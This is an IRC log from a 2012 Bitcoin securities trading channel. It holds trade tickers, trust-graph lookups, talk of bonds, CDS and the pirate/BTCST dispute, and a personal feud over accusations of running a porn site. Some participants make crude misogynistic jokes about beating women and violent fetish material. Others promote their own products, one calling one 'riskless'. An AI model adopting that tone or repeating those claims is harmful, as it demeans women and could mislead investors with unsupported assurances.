[-] Aug 15 19:51:20 [GLBSE] [DMC] 50 @ 0.03501001 = 1.7505 BTC [-] Aug 15 19:51:23 that's like violating the 6 degrees of keven bacon law Aug 15 19:52:11 0_0, when did dmg get up to .04? Aug 15 19:52:26 wasn't it .05 ?! Aug 15 19:52:31 ciuciu: likely true Aug 15 19:52:43 mircea_popescu: it was down to atleast .02 yesterday Aug 15 19:52:47 i trust smickles via rg. Aug 15 19:53:04 usagi: cause i bought him a hotdog or something? Aug 15 19:53:13 ;;gettrust smickles Aug 15 19:53:14 Trust relationship from user mircea_popescu to user smickles: Level 1: 3, Level 2: 19 via 11 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=smickles Aug 15 19:53:23 ciuciu: what's your forum username? Aug 15 19:53:25 ;;gettrust mircea_popescu Aug 15 19:53:27 Trust relationship from user usagi to user mircea_popescu: Level 1: 0, Level 2: 5 via 3 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=usagi&dest=mircea_popescu Aug 15 19:53:31 [GLBSE] [OBSI.HRPT] 80 @ 0.101 = 8.08 BTC [-] Aug 15 19:53:34 interesting Aug 15 19:53:41 jesus apparently i know you through everybody in this chan Aug 15 19:53:41 ;;getturst smickles usagi Aug 15 19:53:42 Error: "getturst" is not a valid command. Aug 15 19:53:55 ;;getthrudst smickles usagi Aug 15 19:53:55 Error: "getthrudst" is not a valid command. Aug 15 19:53:56 is mad7scientist still active even ? Aug 15 19:54:00 bah, spelling Aug 15 19:54:02 ;;getturds Aug 15 19:54:03 Error: "getturds" is not a valid command. Aug 15 19:54:03 thrust? Aug 15 19:54:12 ;;getthryst Aug 15 19:54:13 Error: "getthryst" is not a valid command. Aug 15 19:54:15 ;;gettrust smickles usagi Aug 15 19:54:15 Trust relationship from user smickles to user usagi: Level 1: 0, Level 2: 1 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=smickles&dest=usagi Aug 15 19:54:34 ;;gettrust ciuciu mircea_popescu Aug 15 19:54:35 Trust relationship from user ciuciu to user mircea_popescu: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=ciuciu&dest=mircea_popescu Aug 15 19:54:51 heh Aug 15 19:55:01 [GLBSE] [ASICMINER] 28 @ 0.10499998 = 2.94 BTC [+] Aug 15 19:55:08 all that shit you are saying about him and you don't -1 him on the WOT? Aug 15 19:55:30 what i want to know is how does sera make those sexy curved arrows ! Aug 15 19:55:55 Because I am a senshi. Aug 15 19:56:22 usagi: thrust? Aug 15 19:56:24 or nevermind Aug 15 19:56:35 that sucky moment when you can't read smickle's report cause btctalk is down :( Aug 15 19:56:48 i could pastbin it Aug 15 19:56:50 ;;getthrudst smickles usagi Aug 15 19:57:01 allow me to derail the conversation then http://trilema.com/wp-content/uploads/2012/01/aventurile-zilei-17.jpg Aug 15 19:57:16 so it's not thrust'', it's 'thrust with a d' Aug 15 19:57:38 I like the hemline Aug 15 19:58:17 mircea_popescu: i like all the art you spread Aug 15 19:58:27 it's my life's emission. Aug 15 19:59:06 anyway, http://trilema.com/2012/aventurile-zilei-in-imagini-plus-o-mie-de-cuvinte/ for the full set (+ some words in obscure languages) Aug 15 20:00:06 [GLBSE] [ASICMINER] 20 @ 0.105 = 2.1 BTC [+] Aug 15 20:00:24 [GLBSE] [ASICMINER] 20 @ 0.105 = 2.1 BTC [+] Aug 15 20:01:06 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 15 20:01:43 It's not just you! http://bitcointalk.org looks down from here. Aug 15 20:01:47 [GLBSE] [ASICMINER] 7 @ 0.105 = 0.735 BTC [+] Aug 15 20:01:48 theymos omg feed the hamster! Aug 15 20:05:05 oh well Aug 15 20:05:06 bbl Aug 15 20:05:14 prepare ze drama Aug 15 20:05:50 mircea_popescu: i figured it out, as a 'merican, culturally, i don't think losses in business are a bad thing. ya know, the whole learning from failure thing that has propelled business like Apple and such. I suspect ciuciu isn't 'merican Aug 15 20:06:13 smickles you neglect the part where i have a lot of money and tax purposes. Aug 15 20:06:14 .isdown bitcointalk.org Aug 15 20:06:33 mircea_popescu: oh hyeah, i have paper losses for tax purposes too :/ Aug 15 20:06:58 that house in columbia pretty much means i don't pay federal income tax Aug 15 20:07:19 you warren buffett you :p Aug 15 20:07:28 untill i start having realized gains > 100K usd Aug 15 20:07:55 so, if bitcoin goes to 100 usd per coin, i prolly won't cash out Aug 15 20:08:03 [GLBSE] [TEEK.USD] 10 @ 0.077 = 0.77 BTC [-] Aug 15 20:08:13 just leave it as unrealized gains Aug 15 20:09:25 [GLBSE] [TEEK.USD] 9 @ 0.077 = 0.693 BTC [-] Aug 15 20:10:17 [GLBSE] [ASICMINER] 5 @ 0.105 = 0.525 BTC [+] Aug 15 20:10:44 i think i can realise about 100k on polimedia alone Aug 15 20:10:50 not that i particularly want to, but anyway. Aug 15 20:10:54 [GLBSE] [OBSI.HRPT] 9 @ 0.1 = 0.9 BTC [-] Aug 15 20:12:21 heh, ciuciu, you just reminded me of that pic of elon musk w/o an undershirt Aug 15 20:12:35 now he looks like a businessman Aug 15 20:13:34 [GLBSE] [ASICMINER] 8 @ 0.105 = 0.84 BTC [+] Aug 15 20:14:44 [MPEX] [O.BTCUSD.P150N] 1 @ 0.46976989 BTC [-] Aug 15 20:14:55 musk should get into bitcoins. Aug 15 20:15:55 mircea_popescu: http://pastebin.com/nz4SEUaX Aug 15 20:16:07 a that's too kind. Aug 15 20:17:01 HURR Aug 15 20:17:12 many lulz were just had Aug 15 20:17:16 loudly Aug 15 20:17:42 MPOE stock................................488.22351953 488.22351953 490.94574494 54.84171999 54.84171999 Aug 15 20:17:46 grim outlook Aug 15 20:17:46 wow price stayed the same ? Aug 15 20:18:01 mircea_popescu: it's the GAAP way to do it Aug 15 20:18:08 o ic Aug 15 20:18:13 mircea_popescu: combine that with the valuation allowance Aug 15 20:18:26 yah i saw a second later. Aug 15 20:18:40 mircea_popescu can i give you money and you'll give me more? Aug 15 20:18:49 jcpham there's a number of ways. Aug 15 20:19:04 i love free money Aug 15 20:19:19 well, buy a mpoe bond, or else open a mpex acct if you don't have one already and trade Aug 15 20:19:19 it come at the cost of risk, usually, jcpham Aug 15 20:19:23 or just buy the mpcds Aug 15 20:19:26 or my stocks Aug 15 20:19:48 actually mpcd.a is i think the risklessyest asset in all of btcland. Aug 15 20:19:50 maybe. Aug 15 20:19:53 that b.mpcd.b looks mighty appealing Aug 15 20:19:59 smickles do it Aug 15 20:20:03 pull the trigger Aug 15 20:20:18 buy all mpcd's Aug 15 20:20:24 leave none for the rest Aug 15 20:20:29 lol then resell at premium Aug 15 20:20:35 jcpham: imsaguy has the funds right now Aug 15 20:20:43 nice Aug 15 20:20:49 lol unix is such a wonderful system Aug 15 20:20:54 mircea_popescu: if i had the funds personally, i would have already done that with 'C' Aug 15 20:21:09 smickles 9% sounds juicy fo sho. Aug 15 20:21:20 so what you are saying is... Aug 15 20:21:27 but srsly, buying equity tranche is not for the faint at heart. Aug 15 20:21:30 i need to move funds to this glbse thingamajig Aug 15 20:21:31 mircea_popescu: well, i would have had a goal of 3 to 5% Aug 15 20:22:13 jcpham you can buy mpoe bonds by just sending money over. Aug 15 20:22:23 smickles conceivably it will take some capital hits yea. Aug 15 20:22:35 I'm approximately 22% complete in my journey to over9000 Aug 15 20:22:44 ciuciu: it is a bit of a kludge, but the only funds s²cm has with imsag were the funds that were with him b/f he came on as CIO Aug 15 20:22:59 [GLBSE] [TEEK.USD] 1 @ 0.077 BTC [-] Aug 15 20:23:00 Net cash flow from financing activities............................ (6.44483760) Aug 15 20:23:00 Your journey? Aug 15 20:23:02 heck ?! Aug 15 20:23:04 now we're removing the conflict of interest Aug 15 20:23:33 mircea_popescu: mpoe.etf pays last month's dividend in this month Aug 15 20:23:35 btw, is imsaguy2 running a bank yet ? or still doing the whole shadow hedge fund manager thing Aug 15 20:23:44 imsaguy came out as CIO? Aug 15 20:23:58 Someone care to explain? I think I missed a few things Aug 15 20:24:04 the fund had a better dividend last month due to some options and such Aug 15 20:24:18 but how can that ammount to a loss ?! Aug 15 20:24:31 (bear with me, i only have a cursory understanding of accounting) Aug 15 20:24:45 mircea_popescu: its not a loss, it's cash flow Aug 15 20:24:57 o o i see Aug 15 20:25:00 we speant the cash which we received last month Aug 15 20:25:01 yes yes. Aug 15 20:26:42 jcpham http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 read the part about bonds there. Aug 15 20:27:00 it's more of an investment in you mircea_popescu Aug 15 20:27:07 the bonds are just a vehicle Aug 15 20:27:14 why in me ? am i sexy ? Aug 15 20:27:18 definitely Aug 15 20:27:27 haha cool. Aug 15 20:28:29 somebody needs to organise an event for hedge fund managers Aug 15 20:28:32 what's this... Aug 15 20:28:35 give them free cookies shaped like bitcoins Aug 15 20:28:37 i trust smicklse Aug 15 20:28:38 20 ounces of silver Aug 15 20:28:39 and tits. Aug 15 20:28:49 with bitcoin tattoos. Aug 15 20:28:52 for long standing acts of trustworthyness Aug 15 20:28:59 the mail lady just dropped something in my lap Aug 15 20:29:09 im waiting for some shit in the mail Aug 15 20:29:12 but its coming from cali Aug 15 20:29:12 smickles is supremo A #1 tops Aug 15 20:29:13 i think mickey carver is like the most competent accountant active with btc atm. Aug 15 20:29:18 probably wnot be here today Aug 15 20:29:44 rg : can't you just get some local shit ? Aug 15 20:30:06 visit the proctologist clinic, they usually keep a supply. Aug 15 20:30:39 ooh and 3 grams of gold Aug 15 20:30:46 weak Aug 15 20:31:07 [MPEX] [S.BVPS] 300 @ 0.00384 = 1.152 BTC [+] Aug 15 20:33:17 no Aug 15 20:33:20 they dont have local vendors Aug 15 20:33:23 for e-cig shit Aug 15 20:33:27 if they did i would use them Aug 15 20:33:42 [GLBSE] [ABM] 2 @ 0.249 = 0.498 BTC [+] Aug 15 20:33:43 [GLBSE] [ABM] 5 @ 0.24987999 = 1.2494 BTC [+] Aug 15 20:33:44 o you use those water vapour things ? Aug 15 20:33:44 [GLBSE] [ABM] 3 @ 0.24988 = 0.7496 BTC [+] Aug 15 20:43:02 ok i fail to follow this nanotube Aug 15 20:43:05 "BTCST has the right to change the terms of its outstanding deposits at any time, as long as there is advance notice of at least 30 calendar days." Aug 15 20:43:18 vs Aug 15 20:43:19 "Since the existing ToS includes the provision for pirate's ability to change interest rates "with notice", this latest change in interest rates does not violate the terms of the bet contract, even though it did not itself have a 30 day notice. The term "interest rates" was only used as an example of terms that may change in ToS; the list of examples was not intended to be either exhaustive or necessarily-inclusive. The point of the Aug 15 20:43:19 ToS changes section and advance notice thereof, was to make sure that users are given ample notice for any unexpected material changes." Aug 15 20:43:39 basically, the existing tos said pirate can change interest rates upon notice. Aug 15 20:43:44 of 30 days or more. Aug 15 20:43:53 no, existing tos did not specify 30 days Aug 15 20:44:02 so by changing rates, he's not changing the tos Aug 15 20:44:09 because that's already included in the tos. Aug 15 20:44:11 o wait. Aug 15 20:44:14 i see what you mean. Aug 15 20:44:48 i've been expecting falling rates the whole time Aug 15 20:44:50 nevertheless, the contract you said says Aug 15 20:44:54 terms of its outstanding deposits Aug 15 20:44:54 not sure what the big deal is Aug 15 20:44:55 and not Aug 15 20:44:59 terms of service Aug 15 20:44:59 it only effects lenders Aug 15 20:46:13 so while the guy didn't change the terms of service... he did change the terms of its outstanding deposits. Aug 15 20:46:38 [GLBSE] [BTCASS_BOND_A] 1 @ 0.1489 BTC [+] Aug 15 20:47:11 course coupled with the dissolution clause it'd seem your interpretation follows the spirit of the agreement Aug 15 20:47:17 nevertheless the letter of it was borkt. Aug 15 20:47:59 [GLBSE] [PUREASIC] 2 @ 0.7 = 1.4 BTC [+] Aug 15 20:50:00 [GLBSE] [OBSI.1MHS] 1 @ 0.075 BTC [+] Aug 15 20:52:56 [MPEX] [B.MPCD.A] 80000 @ 0.001 = 80 BTC Aug 15 20:54:36 [MPEX] [F.GIGA.ETF] 5264 @ 0.00113271 = 5.9626 BTC [+] Aug 15 20:55:04 I see... Aug 15 20:55:55 That's why I never do anything personal at work Aug 15 20:59:02 [GLBSE] [NYAN.C] 1 @ 1.053 BTC [-] Aug 15 21:00:13 [MPEX] [O.BTCUSD.P160T] 1 @ 0.41128695 BTC [-] Aug 15 21:00:49 mircea_popescu's site is epic Aug 15 21:01:00 most of the women are promised to me already however Aug 15 21:01:11 so why was I getting highlighted? Aug 15 21:01:15 coming out as CIO? Aug 15 21:01:17 wtf? Aug 15 21:01:35 lol which site ? Aug 15 21:01:37 imsaguy2 tag Aug 15 21:01:53 there's nothing wrong with being cio imsaguy2 Aug 15 21:03:57 [GLBSE] [SYNERGY] 2 @ 0.19 = 0.38 BTC [+] Aug 15 21:04:08 smickles does all the heavy lifting Aug 15 21:04:15 I just watch to make sure they pay once in a while Aug 15 21:04:54 you can tell we are long because we go by the month Aug 15 21:05:06 this week shit is too much Aug 15 21:05:43 smoke a few valerian roots Aug 15 21:05:51 or that Aug 15 21:05:52 get yerr hair did gurrrl Aug 15 21:06:09 hay gurl hay Aug 15 21:06:18 get da ice on ya pinky ring Aug 15 21:06:22 gurlfrend Aug 15 21:08:03 [GLBSE] [YABMC] 5 @ 0.1199 = 0.5995 BTC [+] Aug 15 21:09:27 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 15 21:10:39 [GLBSE] [BITBOND] 2 @ 0.43389999 = 0.8678 BTC [+] Aug 15 21:11:01 573 pounds of butter were used on Julia Child's show “Baking with Julia.” Aug 15 21:11:40 how much cheap wine ? Aug 15 21:12:13 mircea_popescu: yea, i'm no lawyer, so the agreement is not foolproof. but the spirit of the bet is about pirate honoring his obligations and actually being in possession of user funds Aug 15 21:12:22 so i'm not going to decide the bet on minor technicalities Aug 15 21:12:44 yeah. i can see that. tho the litigant in me... :D Aug 15 21:13:11 [GLBSE] [YABMC] 1 @ 0.1199 BTC [+] Aug 15 21:14:37 I think nanotube was bought out Aug 15 21:14:40 he's no longer impartial Aug 15 21:14:41 impeach Aug 15 21:15:02 <_< Aug 15 21:15:03 heh Aug 15 21:15:15 im just jealous he's making 100 btc on this deal :D Aug 15 21:15:50 its only 1% Aug 15 21:17:01 ya, 1% of enough money to buy all the bitcoin magazines wright will ever print in his lifetime. Aug 15 21:18:07 heh Aug 15 21:22:14 [GLBSE] [OBSI.1MHS] 9 @ 0.05 = 0.45 BTC [-] Aug 15 21:23:55 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [+] Aug 15 21:30:13 [GLBSE] [HYDRO.BONDS] 1 @ 1.46 BTC [-] Aug 15 21:40:08 [GLBSE] [YABMC] 2 @ 0.1199 = 0.2398 BTC [+] Aug 15 21:41:42 [GLBSE] [YARR] 25 @ 1.42 = 35.5 BTC [-] Aug 15 21:42:28 [MPEX] [S.MPOE] 34100 @ 0.0003965 = 13.5207 BTC [+] Aug 15 22:03:17 [GLBSE] [ASICMINER] 24 @ 0.105 = 2.52 BTC [+] Aug 15 22:12:48 [MPEX] [O.BTCUSD.P100T] 10 @ 0.0504285 = 0.5043 BTC [-] Aug 15 22:19:01 [GLBSE] [ASICMINER] 8 @ 0.105 = 0.84 BTC [+] Aug 15 22:19:33 [GLBSE] [TYGRR.BOND-PI] 10 @ 1.45 = 14.5 BTC [-] Aug 15 22:25:31 [GLBSE] [PUREASIC] 1 @ 0.7 BTC [+] Aug 15 22:26:46 good porn or bad porn? Aug 15 22:27:07 oh, I have enough of that already Aug 15 22:28:55 haha EskimoBob, just the man i wanted to see. Aug 15 22:29:05 http://polimedia.us/bitcoin/mpex.php?mpsic=B.MPCD.A how's that look to you then ? :D Aug 15 22:29:51 what language is that? Aug 15 22:30:10 english ? Aug 15 22:30:42 [MPEX] [O.BTCUSD.P100N] 1 @ 0.15514368 BTC [-] Aug 15 22:30:53 silly romanians Aug 15 22:31:08 romaniachan lawlz Aug 15 22:31:13 wth you on aboot ? Aug 15 22:31:28 < ciuciu_> Hey smickles: Do you know Mircea is running a porn site? << is that supposed to be a bad thing? Aug 15 22:31:46 ahahaah WHAT THE FUCK Aug 15 22:32:28 let me spare the dood some work, apparently he's not just misguided but also inept Aug 15 22:32:30 ciuciu_: I only ask because you've been in the habit recently of trying to discredit MP Aug 15 22:33:08 here, i also beat up on women : http://trilema.com/2010/nsfw-mosu-cu-joarda/ http://trilema.com/2011/cum-se-bate-femeia/ Aug 15 22:33:27 fucking hayseed, discovered the internet yesterday has no clue about what's what. Aug 15 22:33:29 I will be on the record of making the assertation that porn is not bad because it is art Aug 15 22:33:56 porn is not bad because that's how ciuciu's mom raised her children. Aug 15 22:34:19 [MPEX] [F.GIGA.ETF] 9300 @ 0.00112827 = 10.4929 BTC [-] Aug 15 22:34:29 [GLBSE] [TYGRR.BOND-P] 3 @ 0.9875 = 2.9625 BTC [-] Aug 15 22:34:38 mircea_popescu: that first link is one of my favorite pictures. it tells such an interesting story in my mind Aug 15 22:35:00 all stories with an obedient pair of girls in them are interesting. Aug 15 22:35:11 i think it may be the definition of interesting. Aug 15 22:35:53 ciuciu_: did you bring up the issue of a porn site for any particular reason? Aug 15 22:36:08 who? Aug 15 22:36:11 that's more of a statement Aug 15 22:36:15 because I dont think anyone has the tits for it Aug 15 22:36:26 what's it matter if he is? Aug 15 22:36:32 this chan is so very surreal. Aug 15 22:36:38 indeed Aug 15 22:37:08 Diablo-D3: google poliboobs, he's got the tits Aug 15 22:37:20 [GLBSE] [MU] 1 @ 0.4999 BTC [+] Aug 15 22:37:36 nothx Aug 15 22:37:42 whoa apparently there's a politits blogspot. Aug 15 22:37:54 ciuciu_: i don't thing spamming the info the MP runs a porn site will harm his reputation Aug 15 22:38:01 s/thing/think/ Aug 15 22:38:36 [GLBSE] [TYGRR.BOND-P] 10 @ 0.99999999 = 10 BTC [+] Aug 15 22:38:42 honestly, ciuciu_, you might risk harming your own reputation, depending on how you go about doing it Aug 15 22:38:45 [GLBSE] [FOO.PPPPT] 2 @ 1.0479 = 2.0958 BTC [+] Aug 15 22:38:45 what porn site i run ? Aug 15 22:38:46 [GLBSE] [FOO.PPPPT] 8 @ 1.048 = 8.384 BTC [+] Aug 15 22:38:55 ciuciu_: he doesn't use the forums Aug 15 22:39:04 if your talking about bitcointalk.org Aug 15 22:39:24 mircea_popescu: you got a bitcointalk account recently? Aug 15 22:39:34 nope ? Aug 15 22:39:48 ciuciu_: i'm fairly sure that's his hireling Aug 15 22:40:05 [MPEX] [O.BTCUSD.P150T] 2 @ 0.31958972 = 0.6392 BTC [-] Aug 15 22:40:07 orly Aug 15 22:40:43 o.- puts are starting to move a little. Aug 15 22:40:44 ok Aug 15 22:40:49 wonder if top is in. Aug 15 22:41:27 ciuciu_: if it is his girlfriend's account, how come you are claiming he uses the forum? Aug 15 22:42:43 ciuciu_: then you understand that you just commited the non sequitor fallacy? Aug 15 22:42:51 (sp?) Aug 15 22:43:14 sequitur Aug 15 22:43:23 thank you mp :) Aug 15 22:43:45 it wasn't me it was my gf Aug 15 22:43:53 english as my native language may have harmed my ability to spell in latin Aug 15 22:43:58 [GLBSE] [NYAN.C] 4 @ 1.069 = 4.276 BTC [+] Aug 15 22:44:06 lol Aug 15 22:44:53 ciuciu_: also http://yourlogicalfallacyis.com/ad-hominem Aug 15 22:44:59 about the porn site bit Aug 15 22:45:27 heh, now you're posting stuff that came from my own thread Aug 15 22:45:31 i've seen that Aug 15 22:45:47 i think you'll have to show id. Aug 15 22:46:59 iirc, mp has told me that he used to live in 'merica, but moved becaus of the comming financial fallout Aug 15 22:48:48 mircea_popescu: so your gf doesn't speak romanian and has poor knowledge of romanian according to ciuciu_ Aug 15 22:48:58 except i dont have a gf. Aug 15 22:49:14 i feel like i'm learning stuff today :P Aug 15 22:49:17 lol Aug 15 22:49:20 the thing is though Aug 15 22:49:21 that chan? Aug 15 22:49:25 the romanian one? Aug 15 22:49:32 why is there no good porn on it Aug 15 22:49:34 o, the dtng thing is the topic ? Aug 15 22:49:42 prolly cause you're not adding it Diablo-D3 Aug 15 22:50:04 my art is simply not safe for human consumption Aug 15 22:50:12 er, collection of art Aug 15 22:50:25 Diablo-D3: has kitty porn? Aug 15 22:50:36 heck do you do, cuisinart porn ? Aug 15 22:50:43 smickles: no Aug 15 22:50:46 no furry Aug 15 22:50:48 cuisinart porn, lol Aug 15 22:50:48 (smicks, is cuisin art porn ?) Aug 15 22:51:13 its mostly just mindfuck porn that is hilarious to post on g-rated boards. Aug 15 22:51:20 its not "porn", you dont fap to it Aug 15 22:51:28 you fuck people in the eyesocket with it Aug 15 22:51:44 to me, the word 'porn' is like the pejorative form of 'gay' Aug 15 22:51:59 so 'gay porn' just puts me thru the ringer Aug 15 22:52:02 to me porn is like a contraction of popcorn Aug 15 22:52:20 mircea_popescu: that only makes sense if its dolcett porn Aug 15 22:52:31 i think there's some dolcett somewhere on dtng Aug 15 22:52:43 heck, there was a merkley??? thread i think Aug 15 22:52:51 orly? url Aug 15 22:53:05 d'uh, i have no ideea lol. it is ugc after all. Aug 15 22:53:10 [GLBSE] [NASTY] 1 @ 0.5 BTC [+] Aug 15 22:53:14 nothing hotter than a woman learning how the sausage is made. Aug 15 22:53:48 ciuciu_: i don't see that link as having any meaning in the context of this conversation Aug 15 22:54:22 man, I just made a hilarious joke Aug 15 22:54:28 and virtually no one in here got it Aug 15 22:54:43 sorry D Aug 15 22:54:48 http://polimedia.us/dtng/c/res/107.html something like that Aug 15 22:55:05 ciuciu_: i'm sorry, but i just don't believe that right now Aug 15 22:56:34 ciuciu_: i would very much want to see evidence that MP was going to scam me or my operations out of btc Aug 15 22:57:00 [GLBSE] [TYGRR.BOND-P] 4 @ 0.99133 = 3.9653 BTC [-] Aug 15 22:57:05 [GLBSE] [TYGRR.BOND-P] 30 @ 0.99133 = 29.7399 BTC [-] Aug 15 22:57:07 [GLBSE] [FZB.A] 2 @ 0.031 = 0.062 BTC [+] Aug 15 22:57:08 [GLBSE] [FZB.A] 1 @ 0.0301 BTC [-] Aug 15 22:57:10 [GLBSE] [FZB.A] 115 @ 0.03 = 3.45 BTC [-] Aug 15 22:58:09 lol, why should i give a fuck if he's a dubious character? Aug 15 22:58:26 how the fuck am i dubious. Aug 15 22:58:37 mircea_popescu: you run a porn site? Aug 15 22:58:46 "just saying" Aug 15 22:58:47 lol Aug 15 22:58:57 that's the basis of your argument? Aug 15 22:59:08 lol. actually, i used to produce the stuff, back the previous millenium when it still made money. Aug 15 22:59:18 ciuciu_: so this is an emotional reaction? Aug 15 22:59:53 it doesn't look like it has stopped Aug 15 23:00:57 can you clearly point out evidence of MP doing something bad? Aug 15 23:01:15 not shady or dubious, wierd, etc Aug 15 23:01:27 ciuciu_: you are welcom to say anything you want Aug 15 23:01:47 but if you want me to believe you, you'll need evidenc and sound argumnetation Aug 15 23:02:26 lol, argumentation?, i meant a cogent/sound argument Aug 15 23:02:31 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 15 23:02:33 [GLBSE] [OBSI.HRPT] 49 @ 0.1 = 4.9 BTC [-] Aug 15 23:03:25 ciuciu_: that I should not interact with MP at the significant risk of loss Aug 15 23:03:47 ciuciu_: accusations mean noting if they did not come to a 'conviction' Aug 15 23:03:59 [GLBSE] [BITCOINMINV] 10 @ 0.122999 = 1.23 BTC [+] Aug 15 23:04:11 so then you are out to harm someone for personal reasons? Aug 15 23:04:31 that's not a very good thing to do Aug 15 23:04:47 i've forgotten, what did mp do to you? Aug 15 23:05:30 i've heard that the pr lady pointed out that ciuciu is akin to saying jack shit or something like that Aug 15 23:05:49 .o ud markak Aug 15 23:05:51 ENOTFOUND Aug 15 23:06:05 it wouldn't be found by markak would it Aug 15 23:06:50 ciuciu_: lol, so he pointed out that your name meant something bad in another language, and you're upset at him? Aug 15 23:07:00 that is 'him' in your mind Aug 15 23:07:18 ciuciu_: psy already did that Aug 15 23:10:09 ciuciu_: if you do that in my thread, i will likely and simply point out that you haven't presented me with significant evidence of wrongdoing on the part of MP, or any indication that it puts the fund or its shareholders at risk Aug 15 23:13:53 [MPEX] [S.BVPS] 800 @ 0.00384 = 3.072 BTC [+] Aug 15 23:14:55 [MPEX] [S.BVPS] 895 @ 0.00371138 = 3.3217 BTC [-] Aug 15 23:17:01 ah Aug 15 23:17:06 still MP vs CC Aug 15 23:17:17 hm ? Aug 15 23:17:55 well i came back online several hours later and its still/again MP vs CC talk Aug 15 23:18:09 i dont see much of a point in any of this Aug 15 23:18:14 ciuciu_: btw, good luck in your endeavors. Aug 15 23:18:46 i think smickles is havign fun lol Aug 15 23:19:38 mircea_popescu: i think it's important to pursue possible information that may foreshadow harm to myself or the shareholders of mpoeetf or ss Aug 15 23:20:07 my personal pleasure in the action is masturbatory Aug 15 23:20:20 hehehe okay Aug 15 23:20:48 hey, doesn't that word just mean self-pleasing, yet otherwise pointless? Aug 15 23:21:01 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 15 23:21:03 [GLBSE] [DMC] 1 @ 0.05899998 BTC [+] Aug 15 23:21:21 sorta Aug 15 23:21:26 [MPEX] [S.MPOE] 6700 @ 0.0003965 = 2.6566 BTC [+] Aug 15 23:21:35 [GLBSE] [TYGRR.BOND-P] 4 @ 0.99989999 = 3.9996 BTC [+] Aug 15 23:22:05 huh, the internet seems to disagree Aug 15 23:23:05 well, that seems to not be the word I intended to use Aug 15 23:23:06 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [-] Aug 15 23:24:14 lol Aug 15 23:24:20 thesaurus backfire Aug 15 23:25:18 i don't recall where i (thought that I) learned that word, but i don't think it was a thesaurus Aug 15 23:25:31 [GLBSE] [ASICMINER] 53 @ 0.105 = 5.565 BTC [+] Aug 15 23:26:15 [GLBSE] [DMC] 49 @ 0.05899998 = 2.891 BTC [+] Aug 15 23:26:30 maybe it was a very ellaborate prank. Aug 15 23:26:42 [GLBSE] [DMC] 11 @ 0.05899999 = 0.649 BTC [+] Aug 15 23:27:31 [GLBSE] [NASTY] 1 @ 0.5 BTC [+] Aug 15 23:27:33 [GLBSE] [ASICMINER] 1 @ 0.105 BTC [+] Aug 15 23:28:05 well, then someone needs to cop up to it, i'm sure i owe them a drink Aug 15 23:33:34 [GLBSE] [OBSI.HRPT] 50 @ 0.1 = 5 BTC [-] Aug 15 23:34:51 [MPEX] [B.MPCD.C] 25000 @ 0.001 = 25 BTC Aug 15 23:35:03 [GLBSE] [TYGRR.BOND-P] 1 @ 0.99989999 BTC [+] Aug 15 23:37:35 [GLBSE] [TYGRR.BOND-PI] 9 @ 1.45 = 13.05 BTC [-] Aug 15 23:37:58 [GLBSE] [TYGRR.BOND-PI] 1 @ 1.5 BTC [+] Aug 15 23:38:03 [GLBSE] [TEEK.PPT] 4 @ 1.7889 = 7.1556 BTC [-] Aug 15 23:38:29 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 15 23:39:41 so.,, insured pirate bonds cdo anyone? Aug 15 23:40:37 how would that work? they'd all default at the same time Aug 15 23:40:43 oh, insured Aug 15 23:40:45 sorry :) Aug 15 23:43:06 kakobrekla make sure you mix the insurers well. Aug 15 23:43:17 umm Aug 15 23:43:24 id rather see someone else do it Aug 15 23:43:25 copumpkin has a point, they're not such great matter for a cdo cause of high catastrophe chance. Aug 15 23:43:45 it'd still be somewhat more interesting than uninsured CDO :P Aug 15 23:43:52 but possibly not much more Aug 15 23:44:03 well i guess the whole point of it is who will payout and who wont Aug 15 23:44:05 [GLBSE] [TYGRR.BOND-P] 2 @ 0.99989999 = 1.9998 BTC [+] Aug 15 23:44:09 GIPPT dividend incoming :) Aug 15 23:44:12 if default happens Aug 15 23:44:19 the ideea is if one goes the 2nd likely also goes Aug 15 23:44:26 and so the benefits of cdo-ing aren't so notable. Aug 15 23:44:36 well Aug 15 23:44:40 copumpkin you never said what you thought of my cds! Aug 15 23:44:45 maybe yes maybe no Aug 15 23:44:49 I don't think I saw them! Aug 15 23:44:53 I've been very absent :) Aug 15 23:44:58 o rly ? Aug 15 23:45:04 http://polimedia.us/bitcoin/mpex.php?mpsic=B.MPCD.A Aug 15 23:45:06 [GLBSE] [TYGRR.BOND-P] 7 @ 0.99999999 = 7 BTC [+] Aug 15 23:47:03 [GLBSE] [ASICMINER] 20 @ 0.104 = 2.08 BTC [-] Aug 15 23:47:04 [GLBSE] [ASICMINER] 20 @ 0.102 = 2.04 BTC [-] Aug 15 23:47:05 [GLBSE] [ASICMINER] 5 @ 0.101 = 0.505 BTC [-] Aug 15 23:47:06 [GLBSE] [ASICMINER] 32 @ 0.1001 = 3.2032 BTC [-] Aug 15 23:47:07 [GLBSE] [ASICMINER] 50 @ 0.1001 = 5.005 BTC [-] Aug 15 23:47:08 [GLBSE] [ASICMINER] 73 @ 0.1 = 7.3 BTC [-] Aug 15 23:49:24 Anyone want to buy ASICMINER shares?^^ Aug 15 23:51:07 [GLBSE] [NYAN.B] 3 @ 1 = 3 BTC [+] Aug 15 23:51:09 [GLBSE] [TYGRR.BOND-P] 8 @ 0.99999999 = 8 BTC [+] Aug 15 23:51:31 wheres the pump on asicminer Aug 15 23:52:52 [GLBSE] [BIB.PIRATE] 1 @ 1 BTC [+] Aug 15 23:55:47 [GLBSE] [DMC] 20 @ 0.05899999 = 1.18 BTC [+] Aug 15 23:56:13 [GLBSE] [DMC] 10 @ 0.059 = 0.59 BTC [+] Aug 15 23:56:56 [GLBSE] [DMC] 10 @ 0.059 = 0.59 BTC [+] **** BEGIN LOGGING AT Thu Aug 16 08:47:45 2012 Aug 16 08:52:45 rg: Just curious - why not on glbse? Aug 16 08:52:50 [GLBSE] [ASICMINER] 16 @ 0.105 = 1.68 